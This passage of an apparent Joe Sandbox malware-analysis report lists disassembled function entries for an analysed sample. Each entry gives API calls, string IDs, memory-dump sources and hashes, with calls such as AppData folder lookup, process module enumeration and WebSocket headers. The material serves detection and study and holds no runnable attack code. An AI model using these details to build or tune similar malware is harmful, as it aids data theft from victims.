                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: bfad523fb224bd0716e91e73de8c1edcf0baef2442104d6a09f1a1e8b430f129
                                • Instruction ID: 79f687edefb0d3c288b9e6af12697699e28e972ad0250e976c2fb5a4bcb890d2
                                • Opcode Fuzzy Hash: bfad523fb224bd0716e91e73de8c1edcf0baef2442104d6a09f1a1e8b430f129
                                • Instruction Fuzzy Hash: 5921E7723406508BCB20DA5CE844A6AF7E9DBE17A1B11493FF359CB281CA71DC45D3E5
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C78883
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A188
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: f1759c35957300fdc5c1a79f09c7a7b1722d6cdb61e9678dbe300227b7654af1
                                • Instruction ID: 9cd95a9d6994fd73e1e5684c0e8bdce63d4adcf78a9b6b56c43990fe5ceb2428
                                • Opcode Fuzzy Hash: f1759c35957300fdc5c1a79f09c7a7b1722d6cdb61e9678dbe300227b7654af1
                                • Instruction Fuzzy Hash: 8031BBB5E005159FCB08DF58C8956ADBBB6EB88350F14C269EA19DF384DB30AD01CBD1
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C95922
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A188
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C95935
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: 0a9ed5d59fe62e2afb165c03e30a272f74d2675a9afd1d41d9b45fb8203f923c
                                • Instruction ID: 3a8b535b3d8618384da5dcb4efaeb4e5c8e2db5c0214e384338dc12211658d90
                                • Opcode Fuzzy Hash: 0a9ed5d59fe62e2afb165c03e30a272f74d2675a9afd1d41d9b45fb8203f923c
                                • Instruction Fuzzy Hash: BF115231304B50CBEB328F2CF80471977E1ABD2B61F260A6DE0E187695D761D943D7A5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00C9A430,000000FF), ref: 00C93D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C93D27
                                • wsprintfA.USER32 ref: 00C93D37
                                  • Part of subcall function 00C971E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00C971FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: ee7f23894622614aa44a37b2d66238f027b191889897096db7dd5b044c90ac57
                                • Instruction ID: 768d635ea7a8690fc05abf11ff0fa09a1652f2dcd38311d2874ebac2cad3ec5a
                                • Opcode Fuzzy Hash: ee7f23894622614aa44a37b2d66238f027b191889897096db7dd5b044c90ac57
                                • Instruction Fuzzy Hash: 1501D271644304BFE7105B56DC8EF6BBB78FB4ABA1F004115FA05AB2D0CBB42904C7A1
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C78737
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A188
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 97260b5bcfad407e779ab0541d396203edeec8fc09eb3ef51971c68a13fcab91
                                • Instruction ID: 8381916ee26406f78965a0b8dd1698071eab2b10ffc1f1e72dd1bc33ad63e444
                                • Opcode Fuzzy Hash: 97260b5bcfad407e779ab0541d396203edeec8fc09eb3ef51971c68a13fcab91
                                • Instruction Fuzzy Hash: 3AF09037B800220F8318643E8D8845EA94657E53A033AD725FA1EEF299EC70EC8695D5
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C8E544
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E573
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8E581
                                • lstrcat.KERNEL32(?,0179DE90), ref: 00C8E59C
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: f5d52413793b0e090a387956890e5a4b682c40442b20d573fef9e7f56bdb56d9
                                • Instruction ID: 834792dd436388a46a4e0d0b8c2febac426f8fad47dca7edd4c692bfe3d7dd5c
                                • Opcode Fuzzy Hash: f5d52413793b0e090a387956890e5a4b682c40442b20d573fef9e7f56bdb56d9
                                • Instruction Fuzzy Hash: 7251B875A10108AFCB54EB64DC46EEE33BDFB8D310F048468B91997241DE70BF449BA0
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00C91FDF, 00C91FF5, 00C920B7
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: 21e5ed05852d24e409ebbf630726f3a2dc5bbc3fec31f076972b9092b533c67b
                                • Instruction ID: 7c43566680c37cf069d771d56137e2984ae032665de441c4ed891bfeb9c9d545
                                • Opcode Fuzzy Hash: 21e5ed05852d24e409ebbf630726f3a2dc5bbc3fec31f076972b9092b533c67b
                                • Instruction Fuzzy Hash: 1F217C39510289AFCF20EB76C84C7DDF767DFC0361F846056C8A90B241E3720A0AD796
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C8EBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8EBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8EBF1
                                • lstrcat.KERNEL32(?,0179EF00), ref: 00C8EC0C
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 366bef53b2674d7f2296f6e33237af3156447d72a3cf3a01f61a4f67a6a74702
                                • Instruction ID: 355217f9062b0ecc01fb2342cbab86e5ca74a5ea7ad5b28a30227253978ac8d1
                                • Opcode Fuzzy Hash: 366bef53b2674d7f2296f6e33237af3156447d72a3cf3a01f61a4f67a6a74702
                                • Instruction Fuzzy Hash: 32319571A101189FCB65EF68DC45BEE73B4FF88310F1584B8BA1AA7241DE70AF449B94
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 00C94492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00C944AD
                                • CloseHandle.KERNEL32(00000000), ref: 00C944B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C944E7
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: ed0d4509fcc6285ce229e76cacd11d95de4c6395f6358d155bf95a0092c5caa7
                                • Instruction ID: fedb9b690c1f9d29614326298e199de6e9b764cbd398bdad2a652d131b9540dc
                                • Opcode Fuzzy Hash: ed0d4509fcc6285ce229e76cacd11d95de4c6395f6358d155bf95a0092c5caa7
                                • Instruction Fuzzy Hash: 9FF0FCB19016152FEB209B759C4DFEA7AA8EF15304F044590FA55E7181DBB09D85C790
                                APIs
                                • __getptd.LIBCMT ref: 00C98FDD
                                  • Part of subcall function 00C987FF: __amsg_exit.LIBCMT ref: 00C9880F
                                • __getptd.LIBCMT ref: 00C98FF4
                                • __amsg_exit.LIBCMT ref: 00C99002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00C99026
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: b57c82b6cd4d8229e83d2c52cdcb0d630ae76086cf8b9f836d4c1c74a1325448
                                • Instruction ID: 200aa5e970c0e913d94bc5e41e1b478082bcc0336250a2c3ee33e8f0132b6e69
                                • Opcode Fuzzy Hash: b57c82b6cd4d8229e83d2c52cdcb0d630ae76086cf8b9f836d4c1c74a1325448
                                • Instruction Fuzzy Hash: B4F0F0329096109BDF20BBBC980F70D33A0AF01724F24520CF020AB1D2CF345A10FA59
                                APIs
                                • lstrlen.KERNEL32(------,00C75BEB), ref: 00C9731B
                                • lstrcpy.KERNEL32(00000000), ref: 00C9733F
                                • lstrcat.KERNEL32(?,------), ref: 00C97349
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: 464290e95db4b2e2788d603a6d9d37134664d0cbe4750ab3d20d0219cfd46906
                                • Instruction ID: c0a153fc48f4189a5eb6090623f2b2914dc1fcdf7e5f9922c143d26938723b75
                                • Opcode Fuzzy Hash: 464290e95db4b2e2788d603a6d9d37134664d0cbe4750ab3d20d0219cfd46906
                                • Instruction Fuzzy Hash: 11F0C0745117029FDB649F36D94CA27B6F9EF4570131C891DA89AC7225E730E840DB10
                                APIs
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71557
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71579
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C7159B
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C715FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C83422
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C83471
